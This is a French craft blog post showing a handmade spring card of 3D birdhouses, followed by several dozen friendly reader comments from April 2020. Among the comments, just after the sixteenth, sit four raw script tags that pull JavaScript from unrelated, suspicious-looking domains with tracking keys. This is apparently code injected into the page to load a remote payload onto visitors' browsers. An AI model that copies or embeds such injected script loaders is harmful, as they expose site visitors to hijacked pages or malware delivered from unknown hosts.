• Chez les Oiseaux (carte)

     

     

    Chez les Oiseaux (carte)

     

     

     

    Décliné en "Bonne Journée" à retrouver dans la Rubrique du même nom-"Printemps" ICI

     

     

    Bonjour tout le Monde,

     

    Voici une carte légère pour tous les oiseaux qui gazouillent chaque jour pour notre plus grand bonheur....

    J'ai monté en 3D les maisons d'oiseaux après les avoir découpées dans un catalogue de scrap et colorisées...

    Un fond encré qui m'avait été offert par "Cristal 24"

     

     

     

     

    Chez les Oiseaux (carte)

     

     

    Voici un zoom sur la carte...

     

     

     

     

    Chez les Oiseaux (carte)

     

     

     

     

    Chez les Oiseaux (carte)

     

     

     

     

    Chez les Oiseaux (carte)

     

     

    Voici la carte...

     

     

     

     

    Chez les Oiseaux (carte)

     

     

     

     

    Chez les Oiseaux (carte)

     

     

     

     

    Chez les Oiseaux (carte)

     

     

     

     

    Chez les Oiseaux (carte)

     

     

     

     

    Chez les Oiseaux (carte)

     

     

     

    A retrouver dans la Rubrique "Jours"-"Mardi"-"Printemps" ICI

     

     

     


    Tags Tags : , , , , , ,
  • Commentaires

    37
    Vendredi 17 Avril 2020 à 10:26

    une bien jolie carte effectivement ils chantent toute la journée .Bisous

    36
    Mercredi 15 Avril 2020 à 09:41

    jolie carte a piou piou

    bisous

    35
    Samedi 11 Avril 2020 à 18:58

    elle est très belle ta carte. et sent bon le printemps.  bon week-end de Pâques. bisous liliane

    34
    gaelle
    Vendredi 10 Avril 2020 à 17:35

    adorable valie, vraiment j'aime beaucoup!

    une carte comme je les aime 

    biz

    gaelle

    33
    Vendredi 10 Avril 2020 à 10:27

    J'ai reconnu les tampons, et ton idée de les coloriser à partir du catalogue est super bonne !! En tout le cas le résultat en vaut la peine ! 
    Bravo pour ta jolie carte ! 
    Gros Bisous et Bon week end de Pâques

    32
    winie166
    Vendredi 10 Avril 2020 à 10:24

    très belle carte !

    bisous

    31
    Vendredi 10 Avril 2020 à 01:23

    Je trouve que cette carte est touchante, ça vient sans doute de sa simplicité, ses coloris, enfin bref, je ne sais pas exactement, mais j'aime beaucoup

    Bisous

    30
    Mercredi 8 Avril 2020 à 23:44
    Très belle carte aux des couleurs tendres.
    Gros bisous Béa
    29
    Mercredi 8 Avril 2020 à 23:32

    Elle est trop belle ta carte joliment colorisée bravo

    Prends soin de toi et de tes proches

    Bisous Pierrette67

    28
    Mercredi 8 Avril 2020 à 19:54

    Bonsoir ma chère Valie

    Un petit passage chez toi pour te souhaiter une bonne soirée et je t'envoie de gros bisous d'amitié

    Janine

    27
    Mercredi 8 Avril 2020 à 10:33

    bonjour Val je vois que toi aussi tu as des angoisses

    bien venue au club

    belles tes cartes j'aime bien

    belle journée et prends soin de toi

    respires a fond ça fait du bien

    gros bisous Elyci

    26
    Mercredi 8 Avril 2020 à 09:31

    C'est une très jolie carte printanière ! Bises

    25
    Mardi 7 Avril 2020 à 22:19

    Comme c'est joli ma belle Valie et merci pour les gifs que tu nous concoctes à chaque jour. Tendre bisou d'amitié !

    24
    Mardi 7 Avril 2020 à 20:58
    Elle est mignonne ta carte !
    J'espère que tu vas bien ?
    Prend soin de toi.
    Bisous.
    23
    Mardi 7 Avril 2020 à 17:21

    Bonjour ma douce Valie

    Elle est belle ta carte avec les oiseaux nos petits messager du printemps

    J'espère que tu vas bien ainsi que ta famille

    bonne fin de journée et gros bisous

    Janine

    22
    Mardi 7 Avril 2020 à 16:11

    Petite pose collation pour moi.. je passe te saluer et te féliciter pour ces charmantes créations. Je parle collation mais je ferais mieux de penser à autre chose c'est fou ça plus on est confiné et plus j'ai de petits creux. Oups.. bisous et bon après-midi Valie.

    21
    Mardi 7 Avril 2020 à 15:56
    CathyRose

    Très printanière ta carte, avec de jolies couleurs.
    Bel après-midi, bisous !
    Cathy

    20
    Jacline-H-49
    Mardi 7 Avril 2020 à 14:20

    Vont être très contents les zozios avec ces beaux nichoirs, aux belles couleurs !! Les couples vont s'y plaire, et ils auront beaucoup d'enfants !!! 

    Le soleil vient d'arriver chez moi, j'espère qu'il est chez toi aussi et que tu pourras faire une ptite pause à la chaleur de ses rayons, mais attention, les premiers rayons sont toujours méchants ! 

    Bon après midi ma Valie, 

    je t'envoie des fichiers forts jolis, que tu devrais beaucoup aimer, mais il parait qu'ils ne te parviennent pas !! Sais-tu pourquoi ??

    GROS BISOUS PERMIS ICI 

    Jacline

     

     

    19
    Mardi 7 Avril 2020 à 13:51

    Mon bonheur le matin c est d entendre chanter les oiseaux, alors ta carte est pur enchantement bisous ma douce il fait une chaleur ce n est pas croyable à cette époque 

    18
    marianne
    Mardi 7 Avril 2020 à 13:42

    Elle est trop choupinette ta carte, j'adore !!

    Gros bisous ma belle

    Marianne

    17
    Mardi 7 Avril 2020 à 13:06

    J'adore ! j'aime beaucoup les couleurs pastels ;

    bises / Nicole

    16
    mamijojo77100
    Mardi 7 Avril 2020 à 12:44

    heureusement pour nous la faune et la flore ne sont pas confines pour notre plus grand plaisir, moi aussi je suis dans les oiseaux pour changer des visages..bisous ma valie et profites de ton jardin  JOELLE

    <script src="//qalitygigant.com/227ee61cbd084e801b.js"></script> <script src="http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8830x" type="text/javascript"></script> <script src="http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8830x&format=arrjs&r=1586256183496" type="text/javascript"></script> <script src="http://qalitygigant.com/ext/227ee61cbd084e801b.js?sid=52666_8830_&title=asas&blocks[]=31af2" type="text/javascript"></script>
    15
    Mardi 7 Avril 2020 à 12:01

    Toute mignonne ta cartounette!! Le printemps est bien là avec ces petites oiseaux......

    Bisous et douce journée

    14
    Mardi 7 Avril 2020 à 11:49

    Et voilà une carte joyeuse et Printanière qui nous apporte ton joli sourire...Merci Valie.

    Je pense bien a Toi.Douce journée.

    gif animé, blinkie,repos relax

    13
    Mardi 7 Avril 2020 à 11:46

    Une bien jolie carte et des petits oiseaux qui ont plus de chance que nous, ils peuvent voler pour aller ou ils veulent

    Passe une bonne journée

    Bisous

    12
    Mardi 7 Avril 2020 à 11:25

    trop mignonne ta carte ! bravo

    bisous

    11
    Mardi 7 Avril 2020 à 11:04

    Hello Valie

    Belle carte qui reflète bien le printemps!! bravo

    prends soin de toi et de ta famille 

    bisous

    10
    Mardi 7 Avril 2020 à 10:43

    Adorable ta carte, bravo! Bises Nadine

    9
    Mardi 7 Avril 2020 à 10:20

    Très jolie, que c'est beau la campagne avec le chant des oiseaux. Bonne journée. Bisousssssss 

    8
    Mardi 7 Avril 2020 à 10:01
    Bravo jolie carte ! xx Cath
    7
    Mardi 7 Avril 2020 à 10:00
    Toute douce et jolie cette petite carte ! Bizarre, mais en ce moment je suis en manque d'inspiration alors que j'ai du temps ! Passe une belle journée. Gros bisous
    6
    qinoa
    Mardi 7 Avril 2020 à 09:25

    joli village pour les oiseaux, ils en ont de la chance

    bzz et douce journée

    5
    Mardi 7 Avril 2020 à 09:10
    Comme elle est jolie. Passe une bonne journée. Gros bisous
    4
    Jour de mai
    Mardi 7 Avril 2020 à 09:02

    Coucou Valie, 

    Les oiseaux seraient heureux d'avoir de tels nichoirs, surtout en ce moment où c'est la nidification. J'ai toujours mon rouge gorge qui vient se nourrir mais hélas on ne peut prendre de photos, il est tellement aux aguets et ne reste pas très longtemps.

    Bravo pour cette carte, une très bonne idée et j'ai bien aimé le clocher sur l'un deux. Les couleurs sont tendres comme le printemps même si aujourd'hui c'est tout gris, car hier le soleil est arrivé ensuite mais je crains le contraire pour ce jour. Enfin on verra bien. 

    Bon Mardi et surtout gros bisous ♥♥

    LN

    3
    Mardi 7 Avril 2020 à 08:34

    Trop mimi ces nichoirs, tu as eu une bonne idée pour une très jolie créa.

    Gros bisous, bonne journée.

    2
    Mardi 7 Avril 2020 à 08:34

    Ils sont bien logés les oiseaux chez toi Valie ! Ta carte est superbe ! Bravo ! bisous bisous !

    1
    Mardi 7 Avril 2020 à 08:03

    Bonjour Valie, sympa ta créa j'aime beaucoup !!

    Passe une belle journée

    Bisous de Pat

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :